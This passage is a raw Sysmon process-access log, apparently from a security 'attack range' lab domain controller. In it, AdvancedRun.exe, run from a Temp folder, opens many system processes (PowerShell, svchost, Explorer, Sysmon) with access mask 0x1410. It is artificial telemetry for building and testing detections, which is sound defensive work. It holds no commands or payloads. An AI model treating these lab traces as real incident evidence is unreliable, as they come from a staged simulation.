xe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080503Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.467{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080502Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.467{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080501Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.467{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080500Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.467{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080499Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.467{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004080498Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.466{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080497Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.466{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080496Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.466{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080495Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.466{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080494Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.466{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080493Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.465{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080492Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.465{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080491Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.465{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080490Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.465{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080489Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.465{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
